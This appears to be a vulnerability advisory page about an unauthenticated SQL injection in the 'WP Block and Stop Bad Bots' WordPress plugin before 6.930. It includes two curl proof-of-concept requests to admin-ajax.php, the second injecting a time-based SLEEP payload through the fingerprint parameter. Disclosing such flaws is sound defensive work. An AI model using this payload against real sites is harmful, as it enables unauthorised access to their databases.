Lucene search

K
wpexploitCydaveWPEX-ID:A0FBB79A-E160-49DF-9CF2-18AB64EA66CB
HistoryMar 16, 2022 - 12:00 a.m.

WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi

2022-03-1600:00:00
cydave
81
wordpress
bad bots
sql injection
security vulnerability

EPSS

0.04

Percentile

92.1%

The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection

curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=0' -H 'X-Real-IP: 1.1.1.36'

then

curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(5))' -H 'X-Real-IP: 1.1.1.36'

EPSS

0.04

Percentile

92.1%

Related for WPEX-ID:A0FBB79A-E160-49DF-9CF2-18AB64EA66CB